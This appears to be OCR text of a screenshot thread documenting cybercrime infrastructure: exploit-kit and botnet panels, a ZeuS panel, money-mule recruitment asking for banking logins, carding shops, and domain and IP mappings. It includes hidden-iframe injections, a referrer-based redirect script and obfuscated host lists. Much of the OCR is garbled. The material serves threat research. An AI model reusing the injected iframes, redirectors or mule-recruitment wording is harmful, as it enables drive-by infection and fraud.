<META MAME*"REVISIT-AFTER” CONTENT«"7 days"> 

<META HAME="author” CONTENT="EyeVonder Inc."> 

<META HAME="ROBOTS” CONTENT="ALL"> 


<link href«"index.css" rel*«"stylesheet”" type="text/css" /> 


<script language="javascript">AC_FL_RunContent = 0;</seript> 


<script sro="AC RunActiveContent.js” language="javascript”></script> 
</head> 
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trisem.com 


rtrishest.com 
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FRAGUS Statistics | Files | Traffic links | Preferences | Logout 


Show statistic for Summary data aa 
Chear alls 
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Nposepka IP Ha Hanus B NucTax SpamHaus 


IP: Check 


Nposeka AOMeHa Ha Hanns B 6NeKnucTa OT Google (firefox) 


NlOMeH: 
Se ee Npospeputb 


ABTOMaTUYeCKaa NPOBEKa AOMEHOB Ha Hanya UX B 6NeKNMCTAaX OT 
SpamHaus, Google (firefox) 

COCTOAHME BalMX DTOMEHOB. 
yyav nonafaHua - 


Status 
Google SpamHaus 
= = 


eT Bam B ICO. 


Ajomex/IP | Nocneguuii yexuur 


HlobaBuTb HOBbIN DOMeH: 


ICQ ana yBegomneHun: 


19:15 
https://t.co/JTcqOaYgET https://t.co/rCOjYxKBPe 
215,238.17 upr0306.co 
215.238.1786 ram-220709,com 
67.215,238,178 julythree.com 
667.215.238.178 u1Sjul.com 
7.215.238.1728 Res ple 
19:15 
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http://free-1500-hicfa-form-printable.foper29i142.dynodns.net/ 
http://printable-free-contractor-bid-form. fuder29i160. dynodns. net! 
http://form-ct-1040x-printable-version.fuder29i145. dynodns. net/ 
http://printable-irs-form-1040. fuder29i130.dynodns.net/ 
http://printable-irs-form-w-9.fuder29i133.dynodns. net/ 
http://form-irs-printable-tax. fasoe29i130.dynodns.net/ 

http: //printable-tool-inventory-form.foper29i142. dynodns.net/ 
http://form-irs-printable.fuder29i1 42. dynodns. net! 
http://1099-misc-printable-form. fuder29i130. dynodns.net/ 
http://printable-free-tax-form.fuder29i142.dynodns. net/ 

http: //printable-and-edit-form-1040. fasoe29i139.dynodns.net/ 

(PA http: //printable-homeschool-transcript-form.foper29i130.dynodns.net/ 
Weg http: //printable-1040-form.fasoe29i136.dynodns. net/ 

AB http://blank-receipt-form-printable. fasoe29i127.dynodns. net! 

eg |http://printable-preschool-admission-form.fuder29i148.dynodns. net/ 
ag http://printable-irs-form-w-9. fasoe29/139. dynodns. net! 

RA http://printable-immunization-form.fasoe29i136.dynodns.neté 

sg http://printable-hippa-form.fasoe29i133.dynodns. net/ 

WEB http: irs-1040ez-printable-form.fuder29i133. dynodns. net/ 

OR http://1040-e2-printable-form.foper29i130. dynodns.net/ 
http://printable-u-s-tax-form-1041 foper29i142.dynodns. net/ 
http://free-printable-creditl-form. fuder29i130. dynodns. net/ 

Beg http: //printable-ub-92-claim-form.fuder29i133.dynodns. net/ 

eZ \http:/form-ssa-623-printable. fuder29i160. dynodns.net/ 
http://printable-copy-of-fafsa-form. fuder29i133.dynodns.net/ 
Asg|hittp://printable-foreclosure-form.foper29i130. dynodns. net! 

PM \http://1099-misc-form-printable. fuder29i145.dynodns.net/ 
http://free-rent-agrement-printable-form.fuder29i145. dynodns. net/ 
http://printable-1040x-form. fuder29i142.dynodns.net/ 
http://free-printable-health-claim-form.lasae29i211.dynodns. net/ 
http://printable-home-school-form.foper29i1 48. dynodns. net? 
http://form-free-legal-ohio-printable. fuder29i154.dynodns.net/ 
http://cub-scout-den-dues-printable-form. fuder291145.dynodns.net/ 
http://printable-work-schedule-form.fuder29i127.dynodns. net/ 
http://printable-schedule-form.fuder2911 33. dynodns. net/ 

jag |http:/free-printable-divorce-form. fuder29i130. dynodns. net! 
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"ht 65.234.1 
var ss = '' + location.search; 
if ((location.search).length>0) abc = abcl; else abc = abc2; 


({‘tagged.com’, abc+'tg.php"], 
("f£riendster.com’, abc+"fr.php"], 
("myspace.com', abc+'ms.php"], 
(‘msplinks.com’, abc+'ms.php"], 
{'myyearbook.com',abc+"yb.php"], 
('fubar.com', abc+'fu.php"], 
["twitter.com', abc+'tw.php"], 
("hiS.com', abc+'hiS.php"], 
["bebo.com', abc+'be.php"] 
1? 
var s = '' + document.referrer, r= false; 
for (var i = 0; i < redirects.length: i ++) { 
if ((s.indexOf(redirects{i}(0}) != -1)) { 

var redir=redirects[i] [1] + location.search: 

if ((location.search).length>0) redireredir+'sdomain="+location.host; else redir=redir+' ?domain='"+location.host; 

location.href = redir; 

r= true; 

break; 
} 


} 
if (!r) location.href = abc+'index.php'+ location. search; 


19:18 


https://t.co/JTcqOaYgET https://t.co/ePLWdOZHV6 


19:19 
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(00:00) Mixx (~df@p 123.kmtn.m) left #icqhackers. 

[00:00] sancho[NhT] (~sancho[N @ppp 153-233. dialup. mtu-net.mu) left #icqhackers. 
[00:01] Heel: Hung xenm: MoxHO 1M KOMMMAUTS NepnoBcKue palinu B EXE-mauKu? 
(00:01) qt froSt (frost2k@194.158.219.88) left irc: Ping timeout: 190 seconds 

[00:01] Network (~Net@217.113.16.49) joined #icqhackers. 

(00:02) KrotReal (krotreal@ip-534. dialup. cl. spb.ru) left #icqhackers. 

[00:03] Heel: oi - a¥ 

[00:03] Tlecex: 7 

(00:03) #icqhackers; mode change ‘tv Ileceu' by iFudliFud@spacoom.com 
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boomer-110809.com 


glavnij20090809.com 85.234.128.0/19 —————S_> 529550 


85.234.141.92 


piupiu-110809.com 85-234-141-92 static.as29550.net 


$uz11082009.com 
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assurity-groupinc.cn 
cosco-groupli.cn 
mx.cosco-groupli.com 
mx.puritan-groupco.cn 
mx.puritan-groupinc.com 
mx regency-groupnet.cc 
mx.transgroupmain.cn 
nsl.dummykeath.ce 
nsi,theblackend.cn ; 4 
puritan-groupco.cn 
puritan-groupinc.com 
redeye-groupco.com 
regency-groupnet.cc 
rengo-groupmain.com 


stock-groupmain.cn 


transgroupmain.cn 
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I'm feeling uncomfortable giving you my online banking details. Why do you need it? I'm worrying about unauthorized access to my 


bank account 


@ require @ banking acce e 5 e ave en ease ating 
ere ee e 2 2 eve g 2 2 e F wpe ea f he 
@ same ° arrive 
’ eec enc J a 4 we o eve eee Py oe esa eer 
ve o 4 L o ore er oO > se Ti cr » tre 2 4 
5 206 te sre anc ega ® guarantee trata e a cete ta sre ease -eac a = 
J BLE T AK a TRA SER : ave ea 2 2 2 
ba and a ate se e ake le " e 
Online Banking Details 
URL http:/ 
Login 
Password 
Next Step Skip This Step Back 
* At this moment we require online access to your bank account optionally but strongly recommend to apply with online banking 


details. NOTE: 


larger) 


e higher priority on getting new tasks (amounts are also 
e $100 BONUS to base salary every month 


s with online 
s vith online 


19:25 
https://t.co/JTcqOaYgET https://t.co/mspHOJz0Zm 


24 Thee cement! elena 


WIT 
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19:26 
https://t.co/JTcqOaYgET https://t.co/JxTVWi0icZ 


Se —ts«CPERSOWAL. 


SPECIFIED 
CUSTOMER 
COMPANYS 


cous. ACCOUNTS GRAM MARKET nay ae 


wemeroe BUSINESS scrce ONLINE moun con 


COMPANY BANK wisi == 


OMERS = ity 
INFORMATION COMPENSATION WCREASE 


DETAILS HOURS Ree 
AUTOMATICALLY ~ SYSTEM COVERED 
WESTERN 

one COMM = us 


Fine IAL panes 
us ACCOUNT = 


SAVINGS 
=e ACCURACY LEGA 
_-_ exnieit 


19:26 
https://t.co/JIcqOaYgET https://t.co/yAU9PqO005Q 


CG) VIEW MESSAGE 


Message From/Date (GMT)> 


Supervisor Welcome! 
09.01.2009 18:49:39 Dear John Blackmore 


We welcome you as 8 new employee. Reply Trash 


Sincerely, 
Personnel Supervisor 


19:26 


https://t.co/JTcqOaYgET https://t.co/uyrPZHM1Ih 


. 
= 
a 


> 
You have new message. TA John Blackmore 


Tasks | Messages | Mymoney | My Profile | Documents | Officialinvoices | Help | Quit 
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19:27 
https://t.co/JTcqOaYgET https://t.co/22VErFB6WP 


CARAMBOLAG 


Home reverseSocks Passwords SpamMail 


Country Stats Bot Statis 


19:27 
https://t.co/JTcqOaYgET https://t.co/Za6g5MqqGa 
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Spam start 


Proxy User 


Message setup 


Recipients & SmtpLogins 


Write Messa ge 


19:29 
https://t.co/JIcqOaYgET https://t.co/7IZFjmATqO 
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Information: 


Current use 
amt 
GMT 


Statistics: 


19:29 
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ate (dd.rnemn 


IP-addresses 


Search string 


as text (text/plain 


https://t.co/JTcqOaYgET https://t.co/nVmuCvGuio 


freq: 4800 


packetsize: 


Bots OM 35 
bot’s pro Stunde: 37 
bot's proTag: 49 
alle Bot,s: 49 


426A9F: 3 
503032: 2 
crypter: 44 


TCP size: 


spoof sender IP: 


attack mode: 


max sessions: (for ‘drop by timeout’) 

- 9 Nickname: 

Rang: 

Benutzerld: 
Ausloagen 


1 Besucher Online 


stop 


Refresh rate: EJ (in minutes) [ 


19:30 
https://t.co/JIcqOaYgET https://t.co/dYcq5ineDQ 
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19:31 


https://t.co/JTcqOaYgET https://t.co/Fyfu22DE84 
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® Zeuhosting.me CP - Mozilla Firefox 
Eile Edit View Hijtory Bookmarks Tools Help 
| S ec x a Search Bookmerks end Hitter - *4- What is ZeuEsta 7.0 7 


2 Most Visited @> Getting Started [3] RFHE_ DFG = wrwSottershop.com... “9 Apache Mod Rewrite. adultnewswirebiz - St... “9 Bea Weblogic Apache... 


__) CP = Search in database *  __ Zeushosting.me CP x | __ waw.weyrandon-camions-magasi. x BBP uNkrOwn.ws - View topic - [SELL] .. 


CP :: Summary statistics 


‘otal reports in database: | 414] 
Prime of first activity: Jo2.09.2009 44716157] 
frotal bots: dG 
100.00% - 98 
Minienal version of bots 00 T 2S 
version of bot: be t-2.5-1] 


x Find users # Net @ Previous 6? Highlight all [") Match case 


19:31 
https://t.co/JTcqOaYgET https://t.co/F4O0jqDelUf 


TS.132.211.12/OxIE8 (view /comvole*yeu/?g0 

vooret . <f/center 
vbr 

br 


height: 100px; z-index:1; visibility: hidden:* 


<iframe srco#"http://ttt20091124.info/oko/help.html" width#"i"* 
height="1"></ifraeme> 


=> 


<i-- counter here --> 
/div 


/body 
</htal 


19:35 
https://t.co/JTcqOaYgET https://t.co/CNuW7ZsOxg 


div id=“Layerl” style="position: absolute; left: 0px; top:Opx; width: 100px) 


PSAIZ 201228) veew co * A) 


a 


<iframe src="http://el3x.cn/teatl3/index.php* width="1" height="1"></iframe> 
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[and by Version [ahem 


[Jand by Fouery [US | Urited States (1641) 
> pri eeer ce 


Taw , 
oRoER: by [Borie Be 
snowe o__]ree 

L_ | pO recods in DB). Hint. SGA Query. 
0 Land P Adress Bet Version Rap. Count) Days First raport 
a FAMOASSEAZBSGAESZZOrAIFAaMBSAABAErBADFOGCCIO| MH | ————_—|s1.86 |p 10 _}fs0708) a204 
an perrocsasriecenaressrsseccecassscooeswoce: [MI 108 lp ifs foonresi2sss: 
0 bf | OOASIOEF ACD3087B6067 460860869¢750796000F || HE || kre |p fir |fson708) 20421 
26 - Sunday 
01:35 
https://t.co/JTcqOaYgET https://t.co/olfzqcudzO 
[naBHoe MeHto ¥ Sagayn Y CnpaBKa ¥ 
AobasnTb DDoS 3sagayuy: HTTP 
@ Aobasntb DDoS 3sagayuy: ICMP 
@ Aobasutb DDoS sagayuy: IGMP 
@ AobasnutTb DDoS 3sagayuy: UDP 
01:36 


https://t.co/JTcqOaYgET https://t.co/9u6TcRjlaE 
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simple stats | advanced stats | config | clear 


OS stats Simple browser stats Exploit stats 


os Visits Exploited Percent || Browser Visits Exploited Percent || Exploit Exploited 
Windows XP. ; 123 2% Vi 3 186 35,09% || IE MDAC 
Windows XP SP2 252 109 129% x 23 43 18.3% IE Snapshot 


Windows Vista 6 H Oper. ‘8 18 23,08% PDF 


Windows 98 = 0% Other 0 0 0% PDF vis 


Windows 2000 

Windows 2003 

Windows NT 4 100% 
Other 0 0% 
Linux 0% 


Windows 3 1 0% 


https://t.co/JIcqOaYgET https://t.co/tooMV3Q5qp 


Sup 
As you know GhostMarket.Net has been down for quite a while now, let me tell you why and what's going down 
So firstly the Domain - GhostMarket.Net has been Disabled by my domain provider 
I emailed them asking why it was and asking if there was any chance of re-enabling it, they've told me this 
We received a notification from the FBI that your domain has been used in fraudulent activities. This is a violation of of our 
Service Agreement, so your domain and account have been disabled 
So the Domain is pretty much Fucked, I could get a new domain - GhostMarket.cc and a new host and start it up again but some 
serious shit went down! 
Snapper, the last Host for GM, was raided by a Cyber Team from London and he tells me they most likely have access to GM and 
have dumped the Database, so I hope u guys used Protection 
They were also asking him about me, I'm probably the Most Wanted Cyber Criminal nght now so I gotta keep Underground for a 
while 
So I'm not sure GM will be ever alive again, at least until the heat has died down 
I hope that GM has helped members to meet new people and do successful business with others and that you can understand Big 
Shit 1s Poppin 
Remember guys and girls, to be a Legend Carder, u gotta be a Ghost ;) 
Watch your back, and Fuck the Police! 


You can always email me at 
MSN - 


DISCLAIMER: Government, RIAA, ANTI-Malware, Antivirus, ANTI-Piracy & Goverment Related Groups: By entering, you are 
violating code 943.611.03 of the Internet Privacy Act signed by Bill Clinton in 1995. Therefore you CANNOT threaten our ISP(s), 
person(s) or company(s) storing these file(s) or using this server and cannot prosecute. Please leave this server now as you are 
violating our Terms Of Use & Service and will be taken to court. All html, php, text, documents, pages, words, images on this 
website are for informational purposes only, if you wish to use this information for illegal use then only you are to blame for your 
actions 


01:38 
https://t.co/JTcqOaYgET https://t.co/qkVT28ga24 


Parcel 


Solutions that you need! 


01:39 
https://t.co/JTcqOaYgET https://t.co/UXTuGixhn5 
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oe (pere Ba Eyres Benne perpen §=6Crosece 


°e "Cc . ) Neto neburn Joc aiisettingumene: seg - fici- 
2, Corman vorrynagres @ terannes crpweus Renta soece tet Return 


Cesables 5 Cookies CSS- —) Forme> @ tmages~ OD information Macelareou" . Outlines | 5 Resbes Tooke () View Sources Options v 


HACTPOAKH emcprnenors 

Hacrpofxs 
paccoinka 2 mr 
CTATMCTVKA Bienen 


Forose 
Domed | BOE * || © rete - Moztts rvet_ BD 47°05 wx 


01:40 
https://t.co/JTcqOaYgET https://t.co/NCB9CwhSxXI 
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Taaenan § fpsyepe: Cepeep = Bas 


YES Exploit System 


Crarectnca 


Bow IP-aapec 


ouent npobnsa: 
Manwane Zomena 6 cnuckax MOL: Orcytcre 
Hannune A2onena © GoogleSafeGrowsers:  Orcyrcteyer 
Mannune nowens & McAfee TrustedSource 


Hanmune 2onens © Chncxax MalwareURL 


01:40 
https://t.co/JTcqOaYgET https://t.co/3LBxf2purh 


Comme lone 


| YES Exploit System 


01:41 


https://t.co/JTcqOaYgET https://t.co/r1l3UYxjcO 
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01:41 


01:43 


https://t.co/JTcqOaYgET https://t.co/HDPFfpFWrH 


> ee http://artquide.co.il/267/q. 
Al 


Resolving artguide.co.il... 62.128.52.211 
Connecting to artquide.co_il[62.128.52.211]}:80... connected 
HTTP request sent, awaiting response... 302 Found 


Hddanchev blog: 


connected 


https://t.co/JTcqOaYgET https://t.co/J7Wdnp3Ds1 
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hacked by zhjt. 
china 
Long live the Peoples Republic of China 


Amro SV 


Ale pe Caled nla Oy) phmed he  f ene § Sols p> 4S © 
{ aa} 


01:44 
https://t.co/JTcqOaYgET https://t.co/S2b1MU0p6g 


1330 


<script>(LFi 

// KROTEG(LE) 

var aOcSeS2 = [(LF) 

("fdaicdge lbonnopqgqdk.nllpeplojdpm".replace (/ [diqlnpj)+/g,""),'fb2'], (LF) 
["tkpabfgpbgqnrerd.bkrcknomkh".replace(/[kpbfqnrh]+/q,""),'tgq'], (LF) 
("flgribabegngkdhjabsbbtaelrkk.bhgchonmbb".replace (/(lgbakhj)+/g,""),'fr'), (LP) 
["mrdkjyisfdjdphgfabrcbfeil. lejonqmdaj”.replace ({/[(rdkjfhgbilna] +/g,""),'ms'],(1F) 
("masqpqlfiaqnakdbsb. qjcgofemgh"”. replace (/ [aqfdbjgeh) +/g,""),'ms'), (LP) 
["lijnkb.jipemoush". replace (/[jbipcou] +/g,""),'ms'],(LF) 
("mlpygjtfyfgnefqqanqrnjbpfoloiikji.ngjdejfoqhma”. replace (/[{lpgjfnqidh) +/g,""),' ybo')],(L8) 
("fpiudkblanhirg. pikickhoqlm".replace(/[pidklnhgq] +/g,""),'fu'], (LF) 
["talvihtgtgedbrdp.bcnaqoamgfk". replace (/[alhgdbpnqfk] +/g,""),'tw'), (LF) 
("hjinbfSe.npscgnogugmjj".replace (/[jnbfepsgu] +/g,""),'hiS'], (15) 
("bpiedukbugioruhh.klcftnonlfpmhna"”.replace(/[pidukgrhlftna] +/g,""),'be'] (LF) 
) +E] 

var bidfs814 = [(LF) 

‘o?7." + §205.216.87' , mz 

'S6.7°' + '4.167.16', [LF] 

'216' + '.240.243.14', (LE) 

'84.1' + '09.115.225', (FI 

'93.172' + '.20.68', [LF] 

'11S.' + '42.68.143', [LF] 

M76. + CTO 21763)" | ees 

'67.64.' + '119.34', (LE] 

'98.' + '251.116.110', [LF] 

'109' + '.65.36.143', [LF] 

*77.106.' + '155.218', [LF] 

'99,' + '166.73.29', [LE] 

'66.37.' + '21.162', CLFI 

'99.' + '97.80.182', (LF) 

'85.67.' + '19.204', [LF] 

'?75.' + '64.19.92', [LF] 

"86.1' + '12.14.239', [LF] 

'173' + '.21.167.180", (LE) 

'68.80' + '.233.49', [LF] 

'97.96' + '.232.201', [LE] 

) ELF) 


01:48 
https://t.co/JTcqOaYgET https://t.co/AtqTqRopc6 
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01:49 
https://t.co/JTcqOaYgET https://t.co/SYalkZb8lu 


Default preferences: 


Ajax check before use next exploit: Default exploits: 


aolwinamp directshow 


Default file to load: 


-- Random file v ms09002 snapshot 


com spreadsheet 


Save preferences 


01:49 
https://t.co/JTcqOaYgET https://t.co/vyViMoc9Gx 
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P™ Stats botnet 


Be ts. = Country 24hour ts. =© Country Stats ~=—s All Stats 


B Refresh | Fil Clear stats | HM Clear all 


All bots: 

OnLine/OffLine: 

Active 12hours: 

Active 24hours: 

Country: 

All Task: 
Work/Stop Task: 0 (0%) /0 (0% 


01:54 


https://t.co/JTIcqOaYgET https://t.co/ViT8ktwkWQ 


partnership program «Earning4u» 


from 6$ to 1805 


Registration 
— 


To register in our service piease fill in the form. 
Al the fields marked * are to be flied 
After you have Snished fling the form and cliching "Regster” 
you agree with our "Fiules” 


Your account nummer 
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01:54 
https://t.co/JTcqOaYgET https://t.co/cGwer4ZV3B 


95.143.192.43 ———NEL_g 95.143.192.0/20 ——42-m as4g770 


net 


ns1.installsmarket.net 


ns2.installsmarketnet 


01:55 
https://t.co/JTcqOaYgET https://t.co/3Fh59GHmPH 


95.143.192.41 ———WEE-ge 95.143.192.0/20 ——A—_—-» =s49770 


biz 
installstoryou biz 


—— 


ET 


nsZinstallisforyou.biz ——{—94.75.207.53 hosted-by.leaseweb.com 


nsLinstallstoryou.biz ——“——  94.75,207.22 


aS 
——__p» 
aa 94.75.192.0/18 AS16265 


01:55 
https://t.co/JTcqOaYgET https://t.co/Qfe485eHYm 


ns2.instalisdealercom 


installsdealercom 


95.143.192,42 
95.143.192,0/20 ——“S-ge AS49770 
Ne 


—— a 
nsL.instalisdealercom acim 


01:55 
https://t.co/JTcqOaYgET https://t.co/inavdUQENe 


ns2.loadssell.net 


95.143.192.44 


95.143.192.0/20 ——4S-pe asag770 
—_—_—P 


A 14 ’ 
nsl.Joadssell.net —— 95-149-182:43 


1334 


01:56 
https://t.co/JTcqOaYgET https://t.co/p4ybKHwpYr 


A 
— > 
ns2.mchostu =gj—S E94. 103.88.3 


ET 


ie 94:103.93.3 ———*E_ > 94.103.88.0/21 
nslmchostu <—————__ 


AS48172 


A 
Lsmtp:in.mail.mchostru =@—2=——- 95.142.39.21 


ET 
95,142.32.0/21 


a 
2.smtp-in.mail.mchostru —— 95.142.39.22 
a 
a 
95.142.35.50 


Lal 


shared10.mchostru 


01:57 
https://t.co/JTcqOaYgET https://t.co/OlplsWj7BK 
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CRUSADE-AFFILIATES 


V+0 


01:58 
https://t.co/JTcqOaYgET https://t.co/JTaNN5t663 
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seif (strpos (§ SERVER ['HTTP_USER_AGENT], 'Mac’)) ¢ 


"stitle> Ama 
folder_re 
"simg src=". 


02:29 
https://t.co/JTcqOaYgET https://t.co/vdmoymRrmB 


—_—~»> 


dnsinaunetru <g—SR— = 193.227.240.37 
ET 


193.227,240.38 ——WEL-gs 193.227.240.023 ——Ad-ge as35718 


as aoe N 
dns2,.naunetru 
Ag 193.227.241.60 


installs4sale net 


61.61,.20133 ——NEL_—-g> 61.61.16.0/21 ——4S_-» asogois 


mail installs4sale.net 


net 


02:29 
https://t.co/JTcqOaYgET https://t.co/RTTKMiC6kr 
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02:30 
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https://t.co/JTcqOaYgET https://t.co/S5pdvLOwJZd 


Ftes Total 


02:32 
https://t.co/JTcqOaYgET https://t.co/LDd7DclsCV 


y 


i 
“ 


ommrmoy figs 


02:33 
https://t.co/JTcqOaYgET https://t.co/dtSytYW8MU 


ep 91.213.93.0/24 ——“S—-pe ass287 


UP 
C bapmoniz mail.bgpvpn.kz ——“~ge + 91.213.93.10 
2 PTR 
. —* > core bgpvpn.kz 


ns.bgpypn.kz 


ns.smallshopkzorg ——A—p> 195.78,123.1 ——NEL gm 195.798.122.023 ——“S-m as31366 


02:34 
https://t.co/JTcqOaYgET https://t.co/45vuoz8xHP 
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augment-group.com 
augmentgroup.net 
augment-groupmain. tw 
amplitude-groupmain,net 
‘group. net 
‘-group,.com 
groupli.com 
UpMain, tw 
ty-qgroupmain,.net 
ty-groupmain. tw 
impact-groupinc.net 
impact-groupnet.com 
-groups¥c.com 
fecunda-group.com 
fecunda-groupmain.net 
fecunda-groupmain, tw 
foreaim-g 
foreaimagroup.net 
golden-gateinc.com 


golden-ga 


luxor-groupco 


luxor-groupinc. tw 
groupinc 
-groupfine.net 
upli.com 


02:35 
https://t.co/JTcqOaYgET https://t.co/QVEh3osfl4 
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dailyppi J 


02:36 
https://t.co/JTcqOaYgET https://t.co/Nm8MvKvzZ8 
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Asap Financial Group . A Decade of Superannuaton Experience 


02:36 
https://t.co/JTIcqOaYgET https://t.co/IVOopg70A0 
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Phoenix Exploit's Kit 


02:40 
https://t.co/JTcqOaYgET https://t.co/ns0O2z22i7X 
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The, 20 May 2010 19-20-38 +0400 
31 seconds before reload 


Captchas posted per hast minate: 2 
Min time to solve captcha: 00:18 

Max time to solve captcha: 02:55 
Avg time to sotve captche 01,36 
Records in @ 13 

Queries free clients per Last minute: 0 
Queries from cheents in thes minute: 0 


2010-05-20 19:19:29 2010-05-20 19:24:29 2010-05-20 19:20:29 
Ins 4S 2010-05-20 19:20:10 2010-05-20 19:25;10 2010-05-20 19.20.30 Si) 0000-09-00 00,00,00 | 0000-00-00 09,00.00 


02:45 
https://t.co/JTcqOaYgET https://t.co/zcYSBuPcPx 
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02:46 


*1 


MAIN + REFRESH + REFERRERS + 


unique hits 


os 

windows 95 
windows nt 
windows 98 
windows me 
windows 2k 
windows 2k3 
windows xp 


windows vista 


overall stats 


loads 


exploit stats 


pdf libtiff mdac 


os stats 


hits 


0 (0 loads 


top countries 


hits 


* BLACKLIST CHECK + iFRAME+ CLEAR STATS + SETTINGS + LOGOUT 


exploit rate 


aggressive 


0 (0 loads 


https://t.co/JTcqOaYgET https://t.co/oTZRXbt9UU 
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Search bet (mack: if, ©, country): 
PrP an 


Gh Tasks 
ee ee 


Hest{-port}: 
#. "st Dots Te Qat 
1 ww on oer 3008-12-20 com 
2 qoogeru Ones «a 200812 t 
(Add Task Lents x Referer: Sate: 
Nene: posT: Sat 
Paes: a 
eet Covey want be Ena: 
0 = 2 
Hv a 


pier et 
19.9.5 22K 00S 


Fm: Select fie (2) 


Hd feet Wi rr 
Kos for subject (spit 
spel 


| GEASS Ternplate for SPAM Task 


Select Senders List (a) 
Naree teereiate: 

Servers Uist: Select Servers Lst Verso: 4 
(ree stem oe tempat aed aptead Mine EDD = 

Teerclite: qwel - pleated tat the tae teat mat Fle: Select the 
Unwbiet Stes Oe tee hy Need mot 

‘Status: mie - © hen mal ered mage cas - nt ate ATE H mal 
fos wnat pa 2 (Zivesien ) 
fed qheat PO, or. des, ee a ee te 


~ 


04:44 


*3 


God bless. https://t.co/aDBDVFyvot 
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27 - Monday 


01:20 


https://t.co/JTcqOaYgET https://t.co/N3QIcJT3Ex 
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/ 


Sprott . Asset Management” 


Registration 


Sprott Asset Management 


01:21 
https://t.co/JTcqOaYgET https://t.co/hS8mwYV9uj 
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Employee Registration ~ Step 4 


@2@202020 


I'm feeling uncomfortable giving you my online banking details. Why do you need it? I'm worrying about unauthorized access to my 
bank account. 


We require online banking access to monitor deposits coming from our clients. It saves you much time and increase your rating in our 
system: 


- There is no need to check your bank account every hour during transactions, your personal supervisor will do it instead of you! You'll be informed 
the same minute funds arnve 

- Ne need to send us your bank account statement every week (maybe 2-3 times a week) 

- We trust you much more, you'll receive money bonuses and more transactions! 


It is absolutely safe and legal. We guarantee that al! persona! details will stay safe. Please read our Privacy Policy. NOTE: IT'S 
IMPOSSIBLE TO MAKE ANY TRANSFERS USING ONLINE ACCESS. If you have no online access to your bank account, you should contact 
your bank and activate this service. It will take less than 10 minutes. 


Online Banking Details 

URL: [http:// 
Login: =z 
Password: | 


Next Step Skip This Step | Back 


* At this moment we require online access to your bank account optionally but strongly recommend to apply with online banking 
details. NOTE: 


® agents with online access will have higher priority on getting new tasks (amounts are also larger) 
® agents with online access receive $100 BONUS to base salary every month 


01:23 
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© Blackhole CTATHCTMKA NOTOKM @AiiNbI BESONACHOCT HACTPONKM 


oo re) oo = CEz= AsTootmoanese: 5 com. {i} 


CTATHCTKA CTPAMBI XT = XOCTAN S| JATPYRGH se 
3A Bee rervon 4 3.71 %, tam Russian Federaton 45655 38050 4860 12.7 @ 
63915.0m — S3153x0crs GP 7287 2arvremn necens alata a 
( Seons 2092 1099 323 19.01 
== (G@ Kazakhstan 1124 036 173 16. = 
3a CETOMHA 13.69% O Other county 926 843 93 11.03 @ 
29045 sore 25463 xoctw 487 wren & necene [i Moldova, Republic of 360 326 Bh 1.0 @ 
— fe Germany 32 313 7? 5.47 @ 
= ure 331 285 25 3.77 @ 
BPAY3EPtE xNTeE = XOCT | BATPY3KM (4% © tered a9 172 » 5.61 @ 
© era > 3570 2709 %* a7 a jm Estos 21 171 5 8.77 @ 
© Frefox » 24 HTB 7231 © Y 
@ Sofi 7 4 3s 761 @ 
@ Mom > 98 87 15 7. ew eee SASPEN 190 
@ SE > 182 0 2 Me SE weex 2380 3.25 
@ Crome > 2 2 0 0.00 ere 2130 27 7 
WE woes > 18% no 7 
oc xNTA = XOCTEA «= BAFPYBKN: G S wore > 19 a eZ 
RY Wedows 3645139042337 19.77 = wx > t 0.01 © 
@ Wedows 7 zee8 200881004 sor @ 
oO Widows Vets ou M19 me 6 © noTrom Th xOCTHI? «BATPYE 6% 
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Check a card 


We refund your balance automatically f you are checking CC j f 
s You does not get moneyback for this CC yet 
Joes not marked for a checking at checkout page 
a Y buy this CC not later then in 1 hour before checking 
Notice: f you wil get 57 response ard ked f au King ar 
ard cost and f later card wil be marked as invalid by our checker you wil get moneyback for this 


The price for a 1 card checking ss $0,30 


Card 
number: 


ic———— 
Your previous checks 


You have not check any card yet. 
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BINS: Country: Bank: Code: Levet: CredivDebit: Type: Base: 
_ (+$1) ($1.5) (+$1) 
| [Any (216()98) [Any (216188) [Any (21606) (M4) [Any (21606) [Any (21606) ) [Any M) [usa b2t1 


Cards found: 2283 
461100 owi2 UNITED STATES OF | SMMONS FIRST CLASSIC cesar 101 TRieTR2 $15.00 cr 
| AMERICA NATIONAL BANK 
461100 owi2 UNITED STATES OF | SMIMONS FIRST CLASSIC oear 101 TRI-TR2 $1.00 tr 
AMERIKA NATIONAL BANK 
’ tT t | 
461100 owi2 UNITED STATES OF | SMMONS PRST cLasse oear 101 TRI-TR2 $18.00 | 
AMERIKA NATIONAL BANK 
427178 owi2 UNITED STATES OF | REGIONS BANK PLATINUM oer 101 TRI-TR2 $36.00 iG 
ANERCA 
427178 owl2 UNITED STATES OF | REGIONS BANK PLATINUM cer 101 TRI-TR2 $36.00 r 
AMERICA 
427178 owi2 UNITED STATES OF | REGIONS BANK PLATINUM cesT 101 TRI-TR2 $30.00 r 
ANERICA 
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hilary kneber @hilarykneber - 16 Jan 2011 Vv 
@ #DANCHO DANCHEV Does anyone know ..Is there a way I can determine the 
a exact date that Dancho Danchev began to “unfollow" me? 
1) TQ 9 
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So, what this means Is that any individual's success in the industry comes down to things like reputation, how well you 
can bullshit, etc. But ultimately we have no way to differentiate, say, Bruce Schneier, who has a long academic- and 
professional-grade track record and a habit of writing in a highly intellectual fashion on difficult topics, from Dancho 
Danchev, who is a random Russian dude very few people know anything about, who posts random snippets of facts that 
pass for “analysis.” 
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Proxy Search | List Proxys | 24h Proxys List | Account Settings | PHelp Settings | Billing | Check Your IP 
& Hourly Socks Stats 


icq : 623333 - now online , sorry was out of country , now working . Wellcome 


https://t.co/JTcqOaYgET https://t.co/I96aPvbIicb 


he case of Dancho Danchev's going missing is now beginning to turn into a story of either potential mental 
illness, or, that of a classic tale of Bulgarian secret services removing a problem. It would seem that today, 


after Dancho’s being missing since September, reports are coming out that he was in fact in a mental health 
cei eeo@twuecemcricse The story is still coming to light, but, the case does present some interesting 
ideas for anyone in the information security business like Dancho or others (@ioerror etc) who might poke 
certain forces in the eye with their research and reporting. 


In the case of Dancho, he seemed to be indicating by the email sent before his disappearance, that he felt he 
was being surveilled electronically as well as perhaps physically. The images in the email are not conclusive of 
anything that would indicate a bug or surveillance system had been placed in his house. However, this is not 
to say that the inverter that he found could not have been used in some way for such a system. Usually such 
bugs are small and powered by batteries or, in the case of the higher tech ones, piggyback off the power of 
the phone lines or hard wire electrical systems. Depending on the power requirements though, the inverter 
may have indeed been something that was used to alter power for operational function. 


Surveillance technology aside, the fact is that Dancho, who's blog | am only now coming aware of, does have 
some potential information that could have poked the wrong badger. The badger in this case would be 
